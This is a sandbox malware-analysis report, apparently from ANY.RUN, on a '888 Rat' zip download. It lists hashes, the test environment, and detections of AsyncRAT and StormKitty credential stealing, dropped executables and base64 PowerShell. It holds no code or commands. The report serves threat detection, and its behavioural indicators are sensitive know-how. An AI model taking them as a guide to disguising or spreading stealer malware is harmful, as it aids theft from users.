Malware analysis https://www.upload.ee/files/15529307/888_Rat_v1.2.6.zip.html Malicious activity

Add for printing

URL:	https://www.upload.ee/files/15529307/888_Rat_v1.2.6.zip.html
Full analysis:	https://app.any.run/tasks/6040c169-12d4-47d5-9391-36f9e565ab11
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	March 23, 2024, 18:23:44
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	stealer stormkitty evasion asyncrat rat
Indicators:
MD5:	51707C50B7EB2BEB2E72693DDD346C3B
SHA1:	49B70FCB57760927E8620F27B4C25F4279F763C9
SHA256:	68C33DDDE32A755599A37F2C081C77CA248F0859B120DB7E9253BF5B46CEFE08
SSDEEP:	3:N8DSLr7MJmUFXVJRJEKn:2OLr0RnkKn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.19596 KB4534251
Adobe Acrobat Reader DC (20.013.20064)
Adobe Acrobat Reader DC (20.013.20064)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 ActiveX (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 NPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Flash Player 32 PPAPI (32.0.0.453)
Adobe Refresh Manager (1.8.0)
Adobe Refresh Manager (1.8.0)
CCleaner (6.14)
CCleaner (6.14)
FileZilla 3.65.0 (3.65.0)
FileZilla 3.65.0 (3.65.0)
Google Chrome (109.0.5414.120)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.36.31)
Google Update Helper (1.3.36.31)
Java 8 Update 271 (8.0.2710.9)
Java 8 Update 271 (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Java Auto Updater (2.8.271.9)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.175.29)
Microsoft Edge Update (1.3.175.29)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Firefox (x86 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (32-bit x86) (7.9.1)
Notepad++ (32-bit x86) (7.9.1)
PowerShell 7-x86 (7.2.11.0)
PowerShell 7-x86 (7.2.11.0)
Skype version 8.110 (8.110)
Skype version 8.110 (8.110)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (3.0.11)
VLC media player (3.0.11)
WinRAR 5.91 (32-bit) (5.91.0)
WinRAR 5.91 (32-bit) (5.91.0)

Add for printing

MALICIOUS
- Drops the executable file immediately after the start
  - 888 Rat v1.2.6.exe (PID: 844)
  - SetupTCPDriver.exe (PID: 3556)
  - CL_Debug_Log.txt (PID: 2424)
  - 888 Builder.exe (PID: 1840)
  - Helper.exe (PID: 3060)
  - Helper.exe (PID: 2032)
- Steals credentials
  - Bubbles.scr (PID: 448)
- Steals credentials from Web Browsers
  - Bubbles.scr (PID: 448)
- STORMKITTY has been detected (YARA)
  - Bubbles.scr (PID: 448)
- ASYNCRAT has been detected (MUTEX)
  - Bubbles.scr (PID: 448)
- Actions looks like stealing of personal data
  - Bubbles.scr (PID: 448)
SUSPICIOUS
- Reads security settings of Internet Explorer
  - WinRAR.exe (PID: 2504)
  - 888 Rat v1.2.6.exe (PID: 844)
  - Helper.exe (PID: 2032)
  - 888 Builder.exe (PID: 1840)
- Starts POWERSHELL.EXE for commands execution
  - 888 Rat v1.2.6.exe (PID: 844)
- Reads the Internet Settings
  - 888 Rat v1.2.6.exe (PID: 844)
  - Bubbles.scr (PID: 448)
  - Helper.exe (PID: 2032)
  - 888 Builder.exe (PID: 1840)
  - powershell.exe (PID: 1544)
- Base64-obfuscated command line is found
  - 888 Rat v1.2.6.exe (PID: 844)
- BASE64 encoded PowerShell command has been detected
  - 888 Rat v1.2.6.exe (PID: 844)
- Executable content was dropped or overwritten
  - 888 Rat v1.2.6.exe (PID: 844)
  - 888 Builder.exe (PID: 1840)
  - Helper.exe (PID: 3060)
  - Helper.exe (PID: 2032)
  - SetupTCPDriver.exe (PID: 3556)
  - CL_Debug_Log.txt (PID: 2424)
- Starts application with an unusual extension
  - 888 Rat v1.2.6.exe (PID: 844)
